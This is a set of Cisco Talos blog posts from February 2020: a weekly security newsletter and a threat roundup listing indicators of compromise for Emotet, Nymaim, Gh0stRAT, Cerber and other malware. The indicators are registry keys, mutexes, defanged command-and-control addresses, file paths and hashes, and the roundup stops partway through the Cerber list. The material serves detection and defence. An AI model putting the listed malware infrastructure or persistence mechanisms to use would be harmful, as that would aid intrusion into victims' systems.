This same actor had been observed by other security researchers threatening to release sensitive information if the ransom was not paid, and in several instances, followed through on that threat. This represents a major and dangerous shift in ransomware actor behavior because exfiltration further compels victim organizations to pay the ransom and ensures a significant impact even if proper measures such as backing up important information are implemented. It also shows an advancement in victim profiling by the actors, who may believe that large enterprises will be more willing to pay to keep sensitive data from being published. There are indications that other threat actors are beginning to mimic this behavior.

CTIR will provide additional details on this new behavior in next quarter’s report.

Threat Source newsletter (Feb. 6, 2020)

February 6, 2020, 11:00 am

≫ Next: Threat Roundup for January 31 to February 7

≪ Previous: Quarterly Report: Incident Response trends in fall 2019

$

0

0

Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

There’s never been a better time to be into cyber security podcasts. Our Podcasts page on TalosIntelligence.com got a facelift this week to make room for our new show, Talos Takes. Now, Beers with Talos and Talos Takes live on the same page, where you can get caught up on your cyber news each week.

During each episode of Talos Takes, our researchers and analysts will boil down a complicated topic into a minutes-long explainer that everyone from your parents to the CEO of your company will understand. You can subscribe to Talos Takes on Apple Podcasts, Spotify, Stitcher and Pocket Casts.

As if that wasn’t enough, we also released a new Beers with Talos episode Friday, where the guys discuss why PowerShell has been so widely used in malware.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: A World of Threats: When DNS becomes the new weapon for governments at Swiss Cyber Security Days 
Location: Forum Fribourg, Granges-Paccot, Switzerland
Date: Feb. 12 - 13
Speakers: Paul Rascagnères
Synopsis: In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named “Sea Turtle.” This actor is more advanced and more aggressive than others we’ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims.

Event: “Everyone's Advanced Now: The evolution of actors on the threat landscape” at Interop Tokyo 2020
Location: Makuhari Messe, Tokyo, Japan
Date: April 13 - 15
Speakers: Nick Biasini
Synopsis: In the past, there were two clear classes of adversary an enterprise would face: sophisticated and basic. These basic threats were commodity infections that would require simple triage and remediation. Today, these commodity infections can quickly turn into enterprise-crippling ransomware attacks, costing organizations millions of dollars to recover. Now more than ever, organizations need every advantage they can get — and threat intelligence is a big part of it. Having visibility into your own environment and attacks around the globe are equally vital to success. This talk will cover these trends and show how the gap between the sophisticated and the basic adversary is quickly disappearing.

Cyber Security Week in Review

• Problems with an election results-reporting app led to the delay of Democratic presidential primary results in Iowa this week. Election officials in the state say the app, developed by company Shadow Inc., was not hacked, though security experts say they discovered several flaws in the software that left it open to attack. 
• The Iowa debacle was embarrassing for the Democratic party and the state, since Iowa prides itself on being the first state to host primary elections, setting the stage for the rest of the presidential election. After the mishap, other states are looking into what types of backup plans they need to have in place for their own elections. 
• Amazon CEO Jeff Bezos may have met with FBI investigators as far back as April 2019 regarding the hacking of his iPhone. The interview reportedly took place as part of the FBI’s investigation into the Israeli technology company NSO Group. 
• Gamaredon, an APT with pro-Russian ties, is growing its capabilities. New research shows the group has stepped up its operations so far this year, targeting a larger number of victims and focusing even more on disrupting the Ukrainian government. 
• The EKANS ransomware recently added new capabilities to make it more effective against industrial control services. However, researchers believe the malware’s capabilities are still somewhat primitive.  
• Cargo shipments across Australia are on hold after the logistics company Toll was hit with a ransomware attack. The company says it’s seen no evidence to suggest any personal data was lost. 
• The U.S. government is pushing tech companies and government agencies to develop an alternative to Chinese company Huawei’s 5G service. Huawei’s been locked in a battle with America for years over security concerns. 
• A vulnerability in Google Photos could have allowed anyone to view and download other users’ private videos. Google Takeout, a service that allows users to download archives of their Google data, mistakenly included the wrong videos in some files.  
• Google released the latest update for its Chrome web browser this week, fixing 56 vulnerabilities. The new version also forces more content through HTTPS rather than the less secure HTTP. 
• The NSA’s decision to publicly disclose an urgent bug in Microsoft Internet Explorer could point toward bigger changes for the agency. Traditionally, the NSA has held onto vulnerabilities it discovers that it believes could be used to spy on other state-sponsored actors. 

Notable recent security issues

Title: NetWire RAT reappears with financial motivations
Description: Security researchers recently discovered a new variant of the NetWire remote access trojan being spread via fake business emails. Attackers are sending supposed invoices from legitimate-looking emails that download the RAT. Once infected, NetWire carries out a series of malicious actions that all appear aimed at stealing users’ financial information and logins. NetWire first emerged in 2012, and has since gone through various iterations across multiple adversaries.
Snort SIDs: 53026 – 53030

Title: Cisco small business switches open to denial of service attacks
Description: Cisco disclosed two high-severity vulnerabilities in some of its small business switches. An attacker could exploit these vulnerabilities to carry out denial-of-service attacks or obtain sensitive information. The Series Smart Switches, Series Managed Switches and Series Stackable Managed Switches are all vulnerable, though a patch is now available. Cisco said in its vulnerability advisory that it was unaware of the active exploitation of any of these vulnerabilities.
Snort SIDs: 52993 - 52998

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94 
MD5: 7c38a43d2ed9af80932749f6e80fea6f
Typical Filename: xme64-520.exe
Claimed Product: N/A 
Detection Name: PUA.Win.File.Coinminer::1201

SHA 256: 1460fd00cb6addf9806a341fee9c5ab0a793762d1d97dca05fa17467c8705af7 
MD5: 88cbadec77cf90357f46a3629b6737e6
Typical Filename: FlashHelperServices.exe
Claimed Product: Flash Helper Services
Detection Name: PUA.Win.File.2144flashplayer::tpd 

SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
MD5: 8c80dd97c37525927c1e549cb59bcbf3
Typical Filename: eternalblue-2.2.0.exe
Claimed Product: N/A
Detection Name: W32.85B936960F.5A5226262.auto.Talos

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

Keep up with all things Talos by following us on Twitter. Snort, ClamAV and Immunet also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.  

---

Threat Roundup for January 31 to February 7

February 7, 2020, 11:56 am

≫ Next: Vulnerability Spotlight: Accusoft ImageGear library code execution vulnerabilities

≪ Previous: Threat Source newsletter (Feb. 6, 2020)

$

0

0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 31 and Feb. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,  Snort.org, or ClamAV.net.


For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
The most prevalent threats highlighted in this roundup are:

Threat Name	Type	Description
Doc.Downloader.Emotet-7572697-1	Downloader	Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Nymaim-7569940-0	Malware	Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Dropper.Genkryptik-7572204-0	Dropper	Genkryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, including collecting system information, downloading/uploading files and dropping additional samples.
Win.Worm.Gh0stRAT-7571319-1	Worm	Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
Win.Ransomware.Cerber-7571364-0	Ransomware	Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although, in more recent campaigns, other file extensions are used.
Win.Malware.Kovter-7571676-0	Malware	Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Dropper.TrickBot-7577793-0	Dropper	Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Packed.Zusy-7572206-0	Packed	Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.

---

Threat Breakdown

Doc.Downloader.Emotet-7572697-1

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: Type	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: Start	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ErrorControl	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ImagePath	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: DisplayName	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: WOW64	24
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEXICOGUID Value Name: ObjectName	24

Mutexes	Occurrences
Global\I98B68E3C	24
Global\M98B68E3C	24
Global\IC019706B	1
Global\MC019706B	1
Global\8032E0D6835932960	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
169[.]254[.]255[.]255	1
198[.]58[.]114[.]91	1
93[.]189[.]42[.]146	1
5[.]2[.]75[.]167	1
104[.]236[.]28[.]47	25
133[.]130[.]97[.]61	25

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
252[.]5[.]55[.]69[.]spam[.]abuse[.]ch	1
252[.]5[.]55[.]69[.]spam[.]dnsbl[.]sorbs[.]net	1
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org	1
252[.]5[.]55[.]69[.]b[.]barracudacentral[.]org	1
chonhangchuan[.]net	25

Files and or directories created	Occurrences
%SystemRoot%\SysWOW64\msgchannelb.exe	1
%SystemRoot%\SysWOW64\msgchannela.exe	1
%APPDATA%\windirect\settings.ini	1
%HOMEPATH%\532.exe	25
%ProgramData%\4Cs14qtyjWERecs90J.exe	1
%ProgramData%\8MoBR9ygNour.exe	1

File Hashes

007fc647ae0f8639902f3c6ebae36e993f8b3fc08297118da2feb154df40740f 018ed3d6c7e96cb9010633c08acf5ddce16fccdaae299dfcf7d87e79eda6bd39 07e176a1c503e7a072f8a5f31b0871e961aae07fad606a3c3838b856442487eb 0860e692cd7444b9a85df9d15c46bfd707454cc8c1267d4de56260bf3d6cffa2 0de64e1664365414c3c529bb8dab306b995b61e34cb4d58b0d07ed6d716c715f 0f3358b0b2b1c8e74a38319daad492d7adcf2d130cc8dbd439c684c9c9e5153c 1a8fe6dd6c3cdf567f41bb6977a88c892473797acde8694ced39139640715bcb 1e835f85dc0631028c5bd4aaa75b166b8d9714642876339a4a86ef40973b6ace 220c8e32a0f771b62f01279391d3f93a40d3ce389b45d4ffff0699188792ea23 2cdc0e42a36a681175b5b3eeef29037709e43e7123aabc1f4bcee86fa06a4896 375eea419ae94249961ad625ce1dcd3502860bc1e6e396afb4570c735bf43803 3b89f52ac5385d9f8733f4ec6f3bb7721df689a5dd1c197bfcd3feffb9749dd4 62a2e813d32c179dfe3a565558a48fb0c5b9820b337458028a5232c5de9eaf42 8075bc50d7e867f0a255b9826f5c6bc35a0c82f1408ad3502b499055549c8e1f 85fbf7b289eaa61b99bcbe56e804abf3083cb14448b1ca8a9b20896989f27e9c 8f2d6be36b63d09c277df0cdf4788ed3c057cfaaa7d84e06e2e79ea9998d3dd6 93f972acfdb179a6ecdb35d1ff2602a197aaacb5039572bf5600ebc8186618c2 a892730b092202036e00e25cbdbd3464711db05ffa30c92d99eabeb8be5b6e1e b1ec2a137410f27af98fba5d9da34af0583feead57d2328aa98ecc0cca490081 b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a b6160c8601befc7f62c4e3b274430b710c05e596d69d2c34e9710597336b35cb c00797ecdd835144cf9183edd42e45c2e4b117a4d1fafd670f9c2a4f464eba9a c50e5289d3bebdab1ba9b8d101d47596c8cc72e2616df6690189b1e99ce5268f d00f4a6e014ec6f602d2dd0a99fc10084f111ccae25bde16dd4ee05c204ba7c1 d558d946a685c29cfab63009dba1b91c2a870a2e623d028d0a70b96a9cf12d6f

*See JSON for more IOCs

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Malware.Nymaim-7569940-0

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK	18
<HKCU>\SOFTWARE\MICROSOFT\GOCFK Value Name: mbijg	18

Mutexes	Occurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}	18
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}	18
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}	18
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}	18
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}	18
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}	18
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}	18
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}	18
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}	18

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
wfbimtogx[.]pw	1
icbwujv[.]pw	1
lcque[.]com	1
odouzwyaw[.]in	1
jknqnrpjgdgo[.]in	1
hgbcdxmjm[.]net	1
mnhtemsicp[.]in	1
hcozsjtscf[.]pw	1
vkerdawjo[.]in	1
upkbwykuchtb[.]net	1
adulvwixq[.]in	1
rnhrlupcs[.]com	1
ohxozfvoxg[.]com	1
gphvrtnt[.]in	1
zvsrc[.]pw	1
vlddqnhkoxei[.]com	18
elnqzs[.]net	18
sxrzdfil[.]net	18
papuzvj[.]net	18
ffincb[.]com	18
gnmhtaguavi[.]com	18
pvwdgii[.]pw	18
llrgmivfnqee[.]pw	18
nknbtl[.]pw	18
eeiheou[.]in	18

*See JSON for more IOCs

Files and or directories created	Occurrences
%TEMP%\fro.dfx	18
\Documents and Settings\All Users\pxs\pil.ohu	18
%ProgramData%\ph	18
%ProgramData%\ph\fktiipx.ftf	18
%TEMP%\gocf.ksv	18
%ProgramData%\<random, matching '[a-z0-9]{3,7}'>	18
%APPDATA%\<random, matching '[a-z0-9]{3,7}'>	18
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'>	18

File Hashes

0b4181b933a8d0d350a9df085ac98a27350d49cd8bdded69b0153d5ec6adda21 1224eeb04e14029eec5a711ea7b973954f272851d6f4b4d02fecd4b40ebbd3e5 134d474322c25989e1aa2b6c807473d8a099b06716afcc1904dcadadd74e14d9 20c0747e95843e9c09806f7ef954cfd35c94e2b67907617a3bc0299e00026198 3e5ad8831233e388f485cd6b99c4d6687f1d6e38623bf48d2270919aa4d9e000 59445c64816f7513250a3b49cf5a513c842098be8f3730b33056705ef5c1d624 80cb190082bd6b3e0ec0657a1fd76ae5a53e434e19363e93f6ae999135f99594 89adc81706b7dd975f63be1f1269f63add24f292f5c0d93c92b4b411eb6a9fbc 93fbb35c72feccabccdf4d903d10be4bf0090141cef91dfb0e34ab021138c4ba 9dae9cc1db48a1f31f54b1430f72b5a275c5b36afe274510ff25464d6f7f85a2 b43e324ed527c2d52660e31595b5f61c2151808d351ed80fc853e1345bbf6b5c b828ad714533bdca9fbfd96e14bc8fdcb30f1687bade3025b6b1ddfcf46fb793 c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66 db35f03ab4fb2eff6dfa485e85433f4a61016fc2e18b17793e8e0b6c8afe5585 e3795c261bb84415e76175eee1b7d07aa335b690952116b84cc297a1bbd83001 e71d8f0a51ecf0d078930da518e6b7e8c4c001d42200e0e6965691e8fe1549ea ec3b170ebe1a9a524091d5c46da9080f07a409fb11c51a841b695951f14062ba f84a9b3bcfadbeca17b80922487f7632df91f8a1a4adfde04924c7b9f9b54cd0

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Genkryptik-7572204-0

Indicators of Compromise

Registry Keys	Occurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE Value Name: Blob	10
<HKCU>\SOFTWARE\WINRAR	2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: Startup key	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9 Value Name: F	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5 Value Name: F	2
<HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC Value Name: F	2
<HKCU>\SOFTWARE\WINRAR Value Name: HWID	2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: IpgKLBFV	1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: enchantsf	1

Mutexes	Occurrences
3749282D282E1E80C56CAE5A	1
Global\{fb001475-4304-414b-b3c4-440bd0301e5f}	1
Global\{26af037d-c127-451a-807e-f8d8fcf61bd9}	1
Global\{a7ae8b72-b465-4a93-b481-e821d4114233}	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
172[.]217[.]11[.]46	1
172[.]217[.]10[.]238	7
172[.]217[.]7[.]14	2
172[.]217[.]164[.]174	1
172[.]217[.]7[.]1	2
172[.]217[.]10[.]225	7
198[.]251[.]81[.]30	1
88[.]233[.]219[.]188	1
185[.]61[.]154[.]20	1
193[.]142[.]59[.]98	1
79[.]134[.]225[.]125	1
79[.]134[.]225[.]5	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
parking[.]namesilo[.]com	1
labosan[.]hr	1
doc-14-b8-docs[.]googleusercontent[.]com	1
doc-0s-14-docs[.]googleusercontent[.]com	1
doc-0s-5o-docs[.]googleusercontent[.]com	1
doc-0c-80-docs[.]googleusercontent[.]com	1
steel500[.]duckdns[.]org	1
doc-08-bs-docs[.]googleusercontent[.]com	1
doc-04-2c-docs[.]googleusercontent[.]com	1
olodofries88[.]ddns[.]net	1
doc-0c-bo-docs[.]googleusercontent[.]com	1
doc-08-68-docs[.]googleusercontent[.]com	1
doc-0o-bo-docs[.]googleusercontent[.]com	1
www[.]habitactica[.]com	1
www[.]71kamahistreet[.]com	1

Files and or directories created	Occurrences
%APPDATA%\D282E1	1
%APPDATA%\D282E1\1E80C5.lck	1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5	1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5	3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs	3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\Logs\Administrator	3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\run.dat	3
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\task.dat	2
%System32%\Tasks\AGP Manager	2
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\catalog.dat	1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bin	1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\storage.dat	1
%APPDATA%\D19AB989-A35F-4710-83DF-7B2DB7EFE7C5\settings.bak	1
%TEMP%\53d8a91c-2dcd-4297-b0e0-e83b641b15e1	1
%TEMP%\96d19517-693a-4d9b-b0bb-58fe0e73df6a	2
%HOMEPATH%\subfolder1	2
%APPDATA%\poblyXd	1
%APPDATA%\poblyXd\OeqyZ.exe	1
%TEMP%\tmp6C23.tmp	1
%TEMP%\tmpB4EC.tmp	1
%HOMEPATH%\subfolder1\filename1.exe	1
%HOMEPATH%\BENZOXYPHE	1
%HOMEPATH%\BENZOXYPHE\ARCSINEB.exe	1
%HOMEPATH%\subfolder1\filename1.bat	1
%TEMP%\2022119685.bat	1

*See JSON for more IOCs

File Hashes

0b023aa63679132222f38f83cc5d068b64294f27378657a83d5a1e382a0f5f6a 1e25b0da80f232dd7736f1df2d02c06c5352468c2b28edd38a5325ad726f4318 311e0a1c78adebcb8f4557b7982add59176bf534575f372b15de89b350f043be 56acc6bbd93fa3697f5c18ce956bc9fed48780a62f2de0af0422edc832a59cd7 5a4ae15c7cfc24d8d051199a42438fb860630f20eaf1d860a57b4483a9b2a1e5 62183848f4eb2622fa3c83e80d47993b177654cfd514479af13b35ccda07a9e1 6d878ebe8f57192c2a5a30313d09dcfc0a5535369dbaf3df1853148e260c15b2 a06f1515117373a10440cfc5fabd3a4edaa6bad649aa51512da3c84b732737f2 a49994d715e1420a4aeda5a840281d6a502b9785f4e9c900f1528a862f4f459d ba8781428af0e8996029c8c2a9ed858e67a1433123bf866459f112c6b1a4adb9 ec2b8daf0e06c86331993b6b47402bcfe64d7192860ff1fd9b12bf74c5412df5

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella
WSA

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Worm.Gh0stRAT-7571319-1

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: TFM0N	17

Mutexes	Occurrences
pldofjxf	17
67.198.149.220:8590	17

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
67[.]198[.]149[.]220	17
67[.]198[.]149[.]218	17

Files and or directories created	Occurrences
\M7LTT2PQLUU39779	1
\4E332EPXUP2T2UDD	1
\4E332EPXUP2T2UDD\setting.xml	1
\X1MEDE9U9MQ4Q1UV\setting.xml	1
\M7LTT2PQLUU39779\setting.xml	1
\PLT3XTU7P91P4DXM	1
\EVE2ML37TPT2MTQ3	1
\EVE2ML37TPT2MTQ3\setting.xml	1
\9T7UQELV1DED3E1U	1
\3X2MMX7MP34P213D	1
\9T7UQELV1DED3E1U\setting.xml	1
\3X2MMX7MP34P213D\setting.xml	1
\MM393UEXP3U1V39T	1
\MM393UEXP3U1V39T\setting.xml	1
\4D7913VVQ473ETLX	1
\4D7913VVQ473ETLX\setting.xml	1
\3M2QLV9D1LQD4DUM	1
\3M2QLV9D1LQD4DUM\setting.xml	1
\PLT3XTU7P91P4DXM\setting.xml	1
\L4DV7DE92PLT3L7V	1
\L4DV7DE92PLT3L7V\setting.xml	1
\PM9X2XM11XL7TP9P	1
\PM9X2XM11XL7TP9P\setting.xml	1
\TX19M1LQ22VD4X9P	1
\TX19M1LQ22VD4X9P\setting.xml	1

*See JSON for more IOCs

File Hashes

10090eb3748f2ef4a3410b978df0dec22a0ca628beeaa090831617fb997526cb 3eb86dad7bb8868860f384dd24d16549667ce5b061b58cac1d347d91bc570c8f 44d6e2ae47ae32f07c538f8ddfccc317f75473292ab3b6c83a5ae89d57331917 4c4f1c451117fcf06c6c58ff1db2146cddac669c7c986056d3a544bc639bc81b 551f4de8915c4f2cacf24a47a6f2a8abf04d3013f6d1dcac046b4cd08a316511 5a088eff9314d8fa8c0c3bcde24054159770727d2df8bfd60fc514e14845e60d 8100dadd48d770942ab9ff1fe2e6c07693173d96300d2562703739948239294e 85ca5679a5ca406211e22f5f51498814b632b21bd72de5259eced8b95d981c86 8c8f0914a29cfe562457968af091c6b8696782b86fda717165e8ddca2ac35b83 a12c5d5090f35f8a9aedf9f159469e45a34d76fda6369a7116ca0d6fbc1abfe9 b78ebf81a32e57b134f39555a748823641723d6f42c7878a8115bc6f1363aa31 be31cb2aaaa019e1d3726f8c23705ccef08c64e674a4ff768f5fdc7fbc2f26bb c0d07e09a2d35bcc63135595f0b5065e78adf3c292257e71a034348dd0d21123 cc440bfe8b21e8e03566e43eda8fbf78d5c1194dc9ae8d7228624bc1c17949af dd7089ce8745289e0962fea5c8001c7e0bcb73921c25710a3730ed4fc0d8d8c7 f977796809ac7f7babc3b7e44b84b348bb4965f9d3a4b43a6ea81c3b38ab9101 fcd3bc1ab5b4c663c0365471e09685e01160e1f614423a2c6bafbc89e3dac392

Coverage

Product	Protection
AMP
Cloudlock	N/A
CWS
Email Security
Network Security	N/A
Stealthwatch	N/A
Stealthwatch Cloud	N/A
Threat Grid
Umbrella	N/A
WSA	N/A

Screenshots of Detection

AMP

ThreatGrid

---

Win.Ransomware.Cerber-7571364-0

Indicators of Compromise

Registry Keys	Occurrences
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER Value Name: EnabledV8	36
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER Value Name: EnabledV9	36
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ozilixas	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: uzurnpuj	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: esalaluj	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: agovoryb	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ozekyzhf	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004109A10090400000000000F01FEC Value Name: OutlookMAPI2Intl_1033	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ixilxvuv	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yxazigov	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ewetesyl	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: abizynyw	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: amjsegsd	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: iqapasjj	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: jliwywoc	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: enowivic	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: isydipfb	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: elulyzod	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yhyhohux	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ewpbizyd	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: orebujyj	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ojofukax	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: yrunyfeb	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: esfdozih	1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: uqihevur	1

Mutexes	Occurrences
Global\epugepiqupupamyhatuxadu	19
Global\yladonexilyjabufyfetetawinipipi	19
Global\usysisexaqicuseteqisexe	1
Global\ysywiqujeqikevotevasowogajirube	1
Global\obegahatyqujehinunyfijewydopuva	15
Global\urohamiratototacykojumi	15

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
216[.]239[.]32[.]21	5
216[.]239[.]38[.]21	9
128[.]31[.]0[.]39	25
216[.]239[.]36[.]21	7
216[.]239[.]34[.]21	8
86[.]59[.]21[.]38	21
193[.]23[.]244[.]244	10
